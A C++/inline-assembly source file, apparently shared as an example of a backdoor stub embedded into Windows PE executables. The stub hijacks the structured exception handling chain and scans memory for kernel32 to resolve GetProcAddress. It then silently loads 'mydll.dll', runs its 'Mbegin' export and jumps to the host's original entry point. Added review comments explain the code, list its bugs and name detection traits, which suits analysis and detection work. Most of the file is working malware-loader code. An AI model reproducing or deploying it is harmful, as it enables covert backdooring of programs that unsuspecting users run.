
📄 addlcode.cpp

📁 PE可执行文件的镶入式程序的编写方法及示例(镶入式后门程序&原程序) 由于Microsoft公司的Windows系统是当前大部分个人电脑所使用的操作系统 主要包括win95,98,me,nt4,200
/*
	Resolve the entry address of GetProcAddress by (ab)using structured
	exception handling: a hand-built SEH frame turns a deliberate access
	violation into an in-handler scan of memory for the kernel32 image, and
	any fault raised while probing an unmapped page simply re-enters the same
	handler, which continues the scan where it left off.
*/
#include <stdio.h>
#include <windows.h>
/*
 * main - position-independent loader stub written in MSVC 32-bit inline asm.
 *
 * What the code below does, in order:
 *   1. Builds an SEH registration record on the stack by hand and makes it
 *      the head of the fs:[0] chain. The handler address is the address of
 *      the instruction after `call ex` plus a hard-coded 0x34 bytes.
 *   2. Parks ebp in fs:[4] (the TIB StackBase slot) so the handler can
 *      recover this frame, then writes to address 0 on purpose to fault.
 *   3. The handler scans memory in 64 KiB steps starting at 0x77010000 for an
 *      image with "MZ"/"PE" headers whose export-directory name begins with
 *      "KERNEL32", walks its export names for one beginning "GetProcAddress",
 *      and stores the resolved address in [ebp-8]. A fault while probing an
 *      unmapped page re-enters this same handler, which just keeps scanning.
 *   4. Once [ebp-8] is non-zero the handler restores fs:[0]/fs:[4] and jumps
 *      to `exi`, which resolves LoadLibraryA via GetProcAddress, loads
 *      "mydll.dll", resolves its export "Mbegin" and calls it.
 *   5. It then jumps to the hard-coded address 0x401000 (the accompanying
 *      note says this must be patched to the host program's entry point).
 *
 * Frame slots (all ebp-relative; nothing is declared as a C local):
 *   [ebp-00h]  previous fs:[0] head          [ebp-04h]  previous fs:[4]
 *   [ebp-08h]  GetProcAddress, 0 = not found [ebp-0Ch]  imgbase being probed
 *   [ebp-10h]  export directory VA            [ebp-14h]  scratch k (ptr/index)
 *   [ebp-18h]  export-name index l            [ebp-24h]  base of last probed image
 *   [ebp-124h..ebp-118h]  16-byte ASCII name buffer
 *   [ebp-4008h] GetProcAddress  [ebp-400Ch] LoadLibraryA  [ebp-4030h] Mbegin
 *
 * NOTE(review) - read before editing anything here:
 *   - 32-bit x86 + MSVC `_asm` only; it does not build anywhere else.
 *   - The 0x34 handler offset must equal the encoded length of the
 *     instructions between `call ex` and the handler's first instruction; any
 *     change in that region (even a different immediate encoding) breaks it
 *     silently. Re-verify the offset after every edit.
 *   - The probe range (0x77010000..0x77FF0000, then 0xBFF00000 upward) is tied
 *     to Win9x/NT4/2000-era kernel32 load addresses and has NO upper bound:
 *     the loop's only exit is [ebp-8] != 0. Where kernel32 lives elsewhere
 *     the scan faults forever, and every nested exception leaves more
 *     dispatcher frames on the stack.
 *   - `push eax` for the registration record pushes the value loaded from
 *     fs:[4] (StackBase), not the previous fs:[0] head that `xchg` returned
 *     earlier, so the record's prev link is not a valid chain pointer. This
 *     only goes unnoticed because the handler never returns to the dispatcher.
 *   - `mov [ebp-00h],eax` overwrites the caller's saved ebp, and the slots at
 *     ebp-4008h and below lie far beneath any space this function reserves;
 *     both are survivable only because nothing here ever returns normally.
 *   - The original comments say "mybegin"; the bytes actually written and
 *     looked up are "Mbegin".
 *   - For detection purposes: hand-built fs:[0] records, writes to fs:[4], a
 *     64 KiB-stride MZ/PE scan and a fixed `jmp 0x401000` are all directly
 *     observable characteristics of this stub.
 */
main()
{

	_asm
	{
		call ex// ex pops and re-pushes the return address, so ecx = address of the next instruction
		mov		eax,0x77000000// imgbase seed; the scan loop adds 0x10000 before the first probe
		mov		[ebp-0ch],eax
		mov     eax,esp
		sub     eax,8// the registration record will be built at esp-8 by the two pushes below
		xchg    fs:[0],eax// fs:[0] = new record; eax = previous chain head
		mov DWORD ptr[ebp-00h],eax// save previous head (this slot is also the caller's saved ebp)
		mov	eax,fs:[4]
		mov DWORD ptr[ebp-04h],eax// save previous StackBase
		mov		fs:[4h],ebp// park ebp in fs:[4] so the handler can recover this frame
		add		ecx,34h// handler address = (address after `call ex`) + 0x34, a hard-coded encoded length
		push    ecx// record.handler
		push    eax// record.prev -- NOTE(review): eax now holds StackBase, not the old fs:[0] head
		mov     edx,0
		mov     byte ptr [edx],0// deliberate write to address 0: raises the first exception
	}


// Exception handler body. Entered by the dispatcher at ecx+0x34 (assumed to be the first
// instruction below); re-entered for every fault the scan itself raises.
		_asm
		{
			mov	ebp,fs:[4]// recover the frame pointer parked above
			mov         dword ptr [ebp-8h],0// procgetadd = 0 (no result yet)
// for (;;) { if (procgetadd != 0) goto exi; ... }
// NOTE(review): the original pseudo-C had an imgbase < 0xff000000 bound; the asm does NOT implement it
e104f:
		   cmp         dword ptr [ebp-8h],0
		   jne         exi
// imgbase += 0x10000;
   mov         eax,[ebp-0ch]
   add         eax,10000h
   mov         [ebp-0ch],eax
// if (imgbase == 0x78000000) imgbase = 0xbff00000;  -- skips straight from the NT range to the Win9x range
   cmp         dword ptr [ebp-0ch],78000000h
   jne         is44
   mov         dword ptr [ebp-0ch],0BFF00000h

/* if (*(WORD *)imgbase == 'ZM' && *(WORD *)(imgbase + *(int *)(imgbase + 0x3c)) == 'EP') {
   i.e. DOS header "MZ" and NT signature "PE" at e_lfanew. Reading an unmapped
   imgbase faults here and re-enters this handler. */

is44:

   mov         ecx,dword ptr [ebp-0ch]
   xor         edx,edx
   mov         dx,word ptr [ecx]
   mov         dword ptr [ebp-24h],ecx// remember the probed base; on success this is kernel32's HMODULE
   cmp         edx,5A4Dh// "MZ" as a little-endian word
   jne         e11db
   mov         eax,[ebp-0ch]
   mov         ecx,dword ptr [eax+3Ch]// e_lfanew
   mov         edx,dword ptr [ebp-0ch]
   xor         eax,eax
   mov         ax,word ptr [edx+ecx]
   cmp         eax,4550h// "PE" (low word of the NT signature)
   jne         e11db
    
// fnbase = *(int *)(imgbase + e_lfanew + 0x78) + imgbase;
// 0x78 = offset of the export data directory RVA inside a PE32 IMAGE_NT_HEADERS
   mov         ecx,dword ptr [ebp-0ch]
   mov         edx,dword ptr [ecx+3Ch]
   mov         eax,[ebp-0ch]
   mov         ecx,dword ptr [eax+edx+78h]
   add         ecx,dword ptr [ebp-0ch]
   mov         dword ptr [ebp-10h],ecx// export directory VA
// k = *(int *)(fnbase + 0xc) + imgbase;  -- export directory Name RVA -> DLL name string
   mov         edx,dword ptr [ebp-10h]
   mov         eax,dword ptr [edx+0Ch]
   add         eax,dword ptr [ebp-0ch]
   mov         dword ptr [ebp-14h],eax

// if (*(int *)k == 'NREK' && *(int *)(k+4) == '23LE') {  -- first 8 bytes must be "KERNEL32" (case-sensitive)
   mov         ecx,dword ptr [ebp-14h]
   cmp         dword ptr [ecx],4E52454Bh
   jne         e11db
   mov         edx,dword ptr [ebp-14h]
   cmp         dword ptr [edx+4],32334C45h
   jne         e11db
// k = imgbase + *(int *)(fnbase + 0x20);  -- AddressOfNames
   mov         eax,dword ptr [ebp-10h]
   mov         ecx,dword ptr [ebp-0ch]
   add         ecx,dword ptr [eax+20h]
   mov         dword ptr [ebp-14h],ecx
// for (l = 0; l < *(int *)(fnbase + 0x18); ++l, k += 4) {  -- NumberOfNames
   mov         dword ptr [ebp-18h],0
   jmp         e1127
e1115:
   mov         edx,dword ptr [ebp-18h]
   add         edx,1
   mov         dword ptr [ebp-18h],edx
   mov         eax,dword ptr [ebp-14h]
   add         eax,4
   mov         dword ptr [ebp-14h],eax
e1127:
   mov         ecx,dword ptr [ebp-10h]
   mov         edx,dword ptr [ebp-18h]
   cmp         edx,dword ptr [ecx+18h]
   jge         e11db// NOTE(review): signed compare on a count; jae would be the unsigned form
/* if (*(int *)(imgbase + *(int *)k) == 'PteG' && *(int *)(4 + imgbase + *(int *)k) == 'Acor') {
   only the first 8 bytes ("GetProcA") of the export name are compared */
   mov         eax,dword ptr [ebp-14h]
   mov         ecx,dword ptr [eax]
   mov         edx,dword ptr [ebp-0ch]
   cmp         dword ptr [edx+ecx],'PteG'
   jne         e11d6
   mov         eax,dword ptr [ebp-14h]
   mov         ecx,dword ptr [eax]
   mov         edx,dword ptr [ebp-0ch]
   cmp         dword ptr [edx+ecx+4],'Acor'
   jne         e11d6
// k = *(WORD *)(2*l + imgbase + *(int *)(fnbase + 0x24));  -- AddressOfNameOrdinals[l]
   mov         eax,dword ptr [ebp-18h]
  add         eax,dword ptr [ebp-18h]
  add         eax,dword ptr [ebp-0ch]
  mov         ecx,dword ptr [ebp-10h]
   mov         edx,dword ptr [ecx+24h]
   xor         ecx,ecx
   mov         cx,word ptr [eax+edx]
   mov         dword ptr [ebp-14h],ecx
// k += *(int *)(fnbase + 0x10) - 1;  -- adds (Base - 1)
// NOTE(review): AddressOfNameOrdinals entries are already zero-based indices into
// AddressOfFunctions per the PE format, so this is only a no-op while Base == 1.
   mov         edx,dword ptr [ebp-10h]
   mov         eax,dword ptr [edx+10h]
   mov         ecx,dword ptr [ebp-14h]
   lea         edx,dword ptr [ecx+eax-1]
   mov         dword ptr [ebp-14h],edx
// k = *(int *)(4*k + imgbase + *(int *)(fnbase + 0x1c));  -- AddressOfFunctions[k] (an RVA)
   mov         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-0ch]
   mov         ecx,dword ptr [ebp-10h]
   mov         edx,dword ptr [ecx+1Ch]
   mov         eax,dword ptr [eax+edx]
   mov         dword ptr [ebp-14h],eax
   mov         edx,dword ptr [ebp-14h]
// edx += imgbase  -> virtual address of GetProcAddress
   add         edx,dword ptr [ebp-0ch]
// procgetadd = edx
   mov         dword ptr [ebp-8h],edx

// Restore the SEH chain head and StackBase saved in the first block. Nothing below
// returns to the dispatcher; control leaves via `jne exi` at the top of the loop.

		mov eax,DWORD ptr[ebp-00h]
		mov	fs:[0],eax
		mov eax,DWORD ptr[ebp-04h]
		mov	fs:[4],eax

   jmp         e11db
e11d6:
   jmp         e1115// next export name
e11db:
   jmp         e104f// next imgbase (or exit once [ebp-8] is set)


}
//////////////////////////////////////////////////////////////
exi:
// Resolve LoadLibraryA: GetProcAddress(hKernel32, "LoadLibraryA")

	_asm
	{
	mov         dword ptr [ebp-124h],'daoL'// bytes "Load"
	mov         dword ptr [ebp-120h],'rbiL'// bytes "Libr"
	mov         dword ptr [ebp-11Ch],'Ayra'// bytes "aryA"
	mov         dword ptr [ebp-118h],0000h// terminator
	lea eax,[ebp-124h]
	push eax // lpProcName (stdcall: pushed last-arg-first)
	mov   ebx,dword ptr [ebp-24h]// hModule: base of the image in which GetProcAddress was found (kernel32)
	push ebx
	mov   eax,dword ptr [ebp-8h]
	mov   dword ptr [ebp-4008h],eax// keep GetProcAddress in a slot that survives the calls below
	call eax
	mov   dword ptr [ebp-400ch],eax// LoadLibraryA (not NULL-checked; a failed lookup would be called as 0)
	}

// Load mydll.dll and run its export "Mbegin"

	_asm
	{
	mov         dword ptr [ebp-124h],'ldym'// bytes "mydl"
	mov         dword ptr [ebp-120h],'ld.l'// bytes "l.dl"
	mov         dword ptr [ebp-11Ch],'l'// bytes "l\0\0\0"
	mov         dword ptr [ebp-118h],0000h
	lea eax,[ebp-124h]
	push eax // lpLibFileName
	call dword ptr [ebp-400ch]// LoadLibraryA("mydll.dll")
	cmp         eax,0
	jz	exit1// DLL not found: fall through to the original entry point
	mov ebx,eax// HMODULE of mydll.dll

// Resolve the export. NOTE(review): the bytes written are "Mbegin" (capital M), not "mybegin".

	mov         dword ptr [ebp-124h],'gebM'// bytes "Mbeg"
	mov         dword ptr [ebp-120h],'ni'// bytes "in\0\0"
	mov         dword ptr [ebp-11Ch],0000h
	mov         dword ptr [ebp-118h],0000h
	lea eax,[ebp-124h]
	push eax 
	push ebx
	call dword ptr [ebp-4008h]// GetProcAddress(hMydll, "Mbegin")
	mov   dword ptr [ebp-4030h],eax// Mbegin entry address
	cmp         eax,0
	jz	exit1
	call eax // run Mbegin; no arguments are pushed, so it is presumably void(void) -- verify against the DLL
	jmp exit1
		}

ex:
// Trampoline for `call ex`: leaves the return address in ecx and returns to it.
	_asm
	{
		pop ecx
		push ecx
		ret
	}
exit1:

   _asm
   {
	mov eax,0x401000 // hard-coded original entry point; must be patched for each host binary
	jmp eax
   }
return 0;// unreachable: every path above ends in `jmp eax`
}
